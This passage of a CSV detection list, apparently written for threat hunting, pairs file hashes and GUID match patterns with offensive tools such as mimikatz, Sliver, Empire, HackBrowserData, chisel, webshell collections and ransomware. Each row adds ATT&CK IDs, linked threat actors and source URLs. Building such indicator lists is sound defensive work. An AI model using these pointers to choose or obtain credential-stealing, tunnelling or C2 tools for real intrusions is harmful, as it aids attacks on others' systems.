"*4e09f3d552d00f6ade653b2a9c289a411062b14fab2148f7accab8c8428c9bdb*",".{0,1000}4e09f3d552d00f6ade653b2a9c289a411062b14fab2148f7accab8c8428c9bdb.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","#filehash","N/A","10","10","1132","128","2025-04-10T13:48:00Z","2022-06-28T00:00:28Z","26341"
"*4e0c5d445fc69d7fa6a1e8f72682d16055870a743850d9accd51f2c4cc048000*",".{0,1000}4e0c5d445fc69d7fa6a1e8f72682d16055870a743850d9accd51f2c4cc048000.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","26342"
"*4E0CA74F5E074DFF389263D15E3913750EB437C1C3CD3B212C2998352023B980*",".{0,1000}4E0CA74F5E074DFF389263D15E3913750EB437C1C3CD3B212C2998352023B980.{0,1000}","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","Discovery","https://github.com/canix1/ADACLScanner","1","0","#filehash","AD Enumeration","7","10","1015","173","2025-04-11T14:35:08Z","2017-04-06T12:28:37Z","26343"
"*4e11543f50b3c5b039a4717efddbcf89d8c4b7e8f85f257ad4b0749c7d589d38*",".{0,1000}4e11543f50b3c5b039a4717efddbcf89d8c4b7e8f85f257ad4b0749c7d589d38.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","26344"
"*4e13c7ed59d350b0f0b92062e063afd574452e72a74dd3ee0b5938c514c85749*",".{0,1000}4e13c7ed59d350b0f0b92062e063afd574452e72a74dd3ee0b5938c514c85749.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","26345"
"*4e1531d35b504cd39a927b3f3dab61a7d8642b405e5f999ff52fa47381e0caa6*",".{0,1000}4e1531d35b504cd39a927b3f3dab61a7d8642b405e5f999ff52fa47381e0caa6.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux #filehash","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","26346"
"*4e1531d35b504cd39a927b3f3dab61a7d8642b405e5f999ff52fa47381e0caa6*",".{0,1000}4e1531d35b504cd39a927b3f3dab61a7d8642b405e5f999ff52fa47381e0caa6.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux #filehash","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","26347"
"*4e190d43b933586e8abdcbd64e900d02345834bc0ca314b8b8abc86b3c176bd3*",".{0,1000}4e190d43b933586e8abdcbd64e900d02345834bc0ca314b8b8abc86b3c176bd3.{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","0","#filehash","N/A","7","4","390","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z","26350"
"*4e19296bcc9b552e7993c02d573a1a5102e0733873aced32809d68c4d0b8428d*",".{0,1000}4e19296bcc9b552e7993c02d573a1a5102e0733873aced32809d68c4d0b8428d.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","26351"
"*4e2627bb524a79ae5f2f54a5a209b27a8901d2a92ff466621edb587b504c0428*",".{0,1000}4e2627bb524a79ae5f2f54a5a209b27a8901d2a92ff466621edb587b504c0428.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","26354"
"*4e28d3cd00dac5c63ce16fb55efc2024a7d202074013f1264749cf462f6dba03*",".{0,1000}4e28d3cd00dac5c63ce16fb55efc2024a7d202074013f1264749cf462f6dba03.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","26356"
"*4e2e5319f881c4a83bfeeeaf713beb1ee5ee4b19dff511abe8f05f9e2e1c3c55*",".{0,1000}4e2e5319f881c4a83bfeeeaf713beb1ee5ee4b19dff511abe8f05f9e2e1c3c55.{0,1000}","offensive_tool_keyword","FilelessPELoader","Loading Remote AES Encrypted PE in memory - Decrypted it and run it","T1027.001 - T1059.001 - T1071","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/FilelessPELoader","1","0","#filehash","N/A","10","10","933","196","2023-08-29T21:46:11Z","2023-02-08T16:59:33Z","26359"
"*4E3374D3AC2BA877D985A8D3FCEB7A9D5E518C16029A2DC5CE8DBA4306384A8D*",".{0,1000}4E3374D3AC2BA877D985A8D3FCEB7A9D5E518C16029A2DC5CE8DBA4306384A8D.{0,1000}","offensive_tool_keyword","Dispossessor","Dispossessor ransomware scripts and binaries","T1486 - T1489 - T1490 - T1107 - T1059 - T1001","TA0040 - TA0042","N/A","Dispossessor","Ransomware ","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","26360"
"*4e352b020c8f888cb620a64282df6b60a862f905e831101d060a0fbdbbb25932*",".{0,1000}4e352b020c8f888cb620a64282df6b60a862f905e831101d060a0fbdbbb25932.{0,1000}","offensive_tool_keyword","AV_Evasion_Tool","Undetectable Payload Generator Tool","T1027 - T1036 - T1059 - T1107","TA0005","N/A","N/A","Defense Evasion","https://github.com/1y0n/AV_Evasion_Tool","1","0","#filehash","N/A","10","10","2680","406","2023-12-08T07:38:06Z","2020-04-24T01:11:09Z","26361"
"*4e3beb361e85dab6b6f15e0c72e8e47376d0b678dd7ba537c24a5e0e5085ea7c*",".{0,1000}4e3beb361e85dab6b6f15e0c72e8e47376d0b678dd7ba537c24a5e0e5085ea7c.{0,1000}","offensive_tool_keyword","bypassUAC","UAC bypass for Windows","T1088 - T1202 - T1112 - T1059 - T1548.002","TA0005 - TA0004","N/A","Dispossessor","Defense Evasion","https://github.com/ASkyeye/win-server2022-UAC-Bypass","1","0","#filehash","N/A","9","1","0","1","2024-02-04T00:10:43Z","2021-09-25T03:36:02Z","26362"
"*4E48vR7v8OUJO5OEYkOUUZmF55UOYVqo9l9w2eRS50k=*",".{0,1000}4E48vR7v8OUJO5OEYkOUUZmF55UOYVqo9l9w2eRS50k\=.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","26363"
"*4e50d7d853d7b14ecbaa3ec881d83deac55fb19d4934a6f7ab0cb887b7dbf991*",".{0,1000}4e50d7d853d7b14ecbaa3ec881d83deac55fb19d4934a6f7ab0cb887b7dbf991.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","26364"
"*4e532494ca7946d90f71ace5f8c709fe09de8d20ebf8a0895dda55cf467557e8*",".{0,1000}4e532494ca7946d90f71ace5f8c709fe09de8d20ebf8a0895dda55cf467557e8.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","26365"
"*4e661f7632fefee0728e6c32d0ee6e738f7e6eb5fdba08b8cf9f8a65cbc4f6cd*",".{0,1000}4e661f7632fefee0728e6c32d0ee6e738f7e6eb5fdba08b8cf9f8a65cbc4f6cd.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","26368"
"*4e696f42a13a53a3b747b3575fa66b0ca4b71359a932c7b9ef8d4962bcb7f085*",".{0,1000}4e696f42a13a53a3b747b3575fa66b0ca4b71359a932c7b9ef8d4962bcb7f085.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","26370"
"*4e6ce0dc8e2b945807e72bc1006cc3ed126542ee95395ccbf973a47cc8b7f04a*",".{0,1000}4e6ce0dc8e2b945807e72bc1006cc3ed126542ee95395ccbf973a47cc8b7f04a.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","26371"
"*4e6e01948bbd969f58b1535f30efc9b75c63e0d362b9487b9ea8ebe768ce893e*",".{0,1000}4e6e01948bbd969f58b1535f30efc9b75c63e0d362b9487b9ea8ebe768ce893e.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","Scattered Spider*","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","#filehash","N/A","10","10","4759","404","2025-04-15T11:07:11Z","2016-05-14T23:58:43Z","26372"
"*4e82ec92f2cd6fd2a1f62c874170a00ec419bae8ad713f2ec1d3a25ad1746693*",".{0,1000}4e82ec92f2cd6fd2a1f62c874170a00ec419bae8ad713f2ec1d3a25ad1746693.{0,1000}","offensive_tool_keyword","ShadowStealer","Google Chrome Passwords , Cookies and SystemInfo Dumper","T1555 - T1539 - T1125 - T1083 - T1056","TA0009 - TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/xelroth/ShadowStealer","1","0","#filehash","N/A","10","","N/A","","","","26375"
"*4e99cad33b9606164531fa25d8acd59348d83961a45179b7bf7bc54540f03eb8*",".{0,1000}4e99cad33b9606164531fa25d8acd59348d83961a45179b7bf7bc54540f03eb8.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","26377"
"*4eb2e5cc10a089a025c8daf42bafebab7dd1096b9aaac4c643d10c80ee85858b*",".{0,1000}4eb2e5cc10a089a025c8daf42bafebab7dd1096b9aaac4c643d10c80ee85858b.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","26378"
"*4eb354e4fa6a349133460b511bbe2dab2afe57ef6d05ef0ae40c91627d17b18c*",".{0,1000}4eb354e4fa6a349133460b511bbe2dab2afe57ef6d05ef0ae40c91627d17b18c.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","26379"
"*4ec058080435d27714e38d5544dacafdf3c7739dc3a0615a57cede8c124a9ae4*",".{0,1000}4ec058080435d27714e38d5544dacafdf3c7739dc3a0615a57cede8c124a9ae4.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","https://www.virustotal.com/gui/file/4ec058080435d27714e38d5544dacafdf3c7739dc3a0615a57cede8c124a9ae4/behavior","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","26382"
"*4ec5213f3a8aed7bd1daac07c9d50932edea9384e19a215525b963427c25066d*",".{0,1000}4ec5213f3a8aed7bd1daac07c9d50932edea9384e19a215525b963427c25066d.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","26383"
"*4ed0631fabe9b3b097f314d1cddb565f082533bf589e8366ec01d149c931d6f6*",".{0,1000}4ed0631fabe9b3b097f314d1cddb565f082533bf589e8366ec01d149c931d6f6.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","26384"
"*4ED3C17D-33E6-4B86-9FA0-DA774B7CD387*",".{0,1000}4ED3C17D\-33E6\-4B86\-9FA0\-DA774B7CD387.{0,1000}","offensive_tool_keyword","FormThief","Spoofing desktop login applications with WinForms and WPF","T1204.002 - T1056.004 - T1071.001","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/mlcsec/FormThief","1","0","#GUIDproject","N/A","8","2","173","31","2024-02-19T22:40:09Z","2024-02-19T22:34:07Z","26385"
"*4ed4145e2a1ea00c2cf463f86d627341b58d0e0887ae317ebfce6dd5d48f8749*",".{0,1000}4ed4145e2a1ea00c2cf463f86d627341b58d0e0887ae317ebfce6dd5d48f8749.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","#filehash","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","26386"
"*4edc7770464a14f54d17f36dc9d0fe854f68b346b27b35a6f5839adf1f13f8ea*",".{0,1000}4edc7770464a14f54d17f36dc9d0fe854f68b346b27b35a6f5839adf1f13f8ea.{0,1000}","offensive_tool_keyword","ProxyLogon","ProxyLogon exploitation","T1190 - T1210 - T1213 - T1003 - T1059.003","TA0001 - TA0002 - TA0006 - TA0007","N/A","Dispossessor","Exploitation tool","https://www.microsoft.com/en-us/security/blog/2021/03/02/hafnium-targeting-exchange-servers/","1","0","#filehash","webshell used with proxylogon exploitation","10","10","N/A","N/A","N/A","N/A","26387"
"*4EE2C7E8-095D-490A-9465-9B4BB9070669*",".{0,1000}4EE2C7E8\-095D\-490A\-9465\-9B4BB9070669.{0,1000}","offensive_tool_keyword","Maestro","Maestro is a post-exploitation tool that simplifies interaction with Intune/EntraID from a C2 agent on a user's workstation bypassing the need for user password knowledge - token manipulation or Azure authentication processes","T1550.004 - T1078 - T1087 - T1071 - T1102","TA0006 - TA0003 - TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Mayyhem/Maestro","1","0","#GUIDproject","behavior detections opportunities here https://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30","9","4","333","33","2025-02-11T23:02:00Z","2024-01-15T18:45:50Z","26389"
"*4ee43d69320e28910a475259994a33b3725c7b5d65a16a457354d0c23a51c820*",".{0,1000}4ee43d69320e28910a475259994a33b3725c7b5d65a16a457354d0c23a51c820.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","26390"
"*4eea1e0122661de3208f478a47f1c09cb9480664712a0e34e753df8663025e25*",".{0,1000}4eea1e0122661de3208f478a47f1c09cb9480664712a0e34e753df8663025e25.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","26391"
"*4ef27da3276651f20e1d401412bb95c823f277b7a28f693eed55f819aa65e7bf*",".{0,1000}4ef27da3276651f20e1d401412bb95c823f277b7a28f693eed55f819aa65e7bf.{0,1000}","offensive_tool_keyword","AV_Evasion_Tool","Undetectable Payload Generator Tool","T1027 - T1036 - T1059 - T1107","TA0005","N/A","N/A","Defense Evasion","https://github.com/1y0n/AV_Evasion_Tool","1","0","#filehash","N/A","10","10","2680","406","2023-12-08T07:38:06Z","2020-04-24T01:11:09Z","26394"
"*4ef4954e75d38c111212488ce16b682352f7538fdf11eb94eac86ef4885701b0*",".{0,1000}4ef4954e75d38c111212488ce16b682352f7538fdf11eb94eac86ef4885701b0.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","26396"
"*4EF73752-78B0-4E0D-A33B-B6637B6C2177*",".{0,1000}4EF73752\-78B0\-4E0D\-A33B\-B6637B6C2177.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","#GUIDproject","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","26397"
"*4f050e27f770c59e8402d0faed061d0492b1d50d5aaed4f8c548b823dfa2dd09*",".{0,1000}4f050e27f770c59e8402d0faed061d0492b1d50d5aaed4f8c548b823dfa2dd09.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","26399"
"*4f050eea5800f10338894c847bdbfa5a93bd03115ed7a3c979422f0f0ca95739*",".{0,1000}4f050eea5800f10338894c847bdbfa5a93bd03115ed7a3c979422f0f0ca95739.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","26400"
"*4f0f61d1c0b3904b0a3409f8ff70af3b822b46e4c7f2fca0b642cc278b56209f*",".{0,1000}4f0f61d1c0b3904b0a3409f8ff70af3b822b46e4c7f2fca0b642cc278b56209f.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","26402"
"*4f0fe8424ce7e9de58445e0ca1262d242861bb0239078eae16c41aec863bc09d*",".{0,1000}4f0fe8424ce7e9de58445e0ca1262d242861bb0239078eae16c41aec863bc09d.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","26403"
"*4f147344cc3252a3d59329031202725bc65f0ef58d41cca6fa24d5fe462fc84d*",".{0,1000}4f147344cc3252a3d59329031202725bc65f0ef58d41cca6fa24d5fe462fc84d.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","26404"
"*4F169EA5-8854-4258-9D2C-D44F37D88776*",".{0,1000}4F169EA5\-8854\-4258\-9D2C\-D44F37D88776.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","#GUIDproject","N/A","10","10","1225","323","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z","26405"
"*4f188f89c92bb150c8b0b623d2041373b946a8920e97e464964ed79def029605*",".{0,1000}4f188f89c92bb150c8b0b623d2041373b946a8920e97e464964ed79def029605.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","26406"
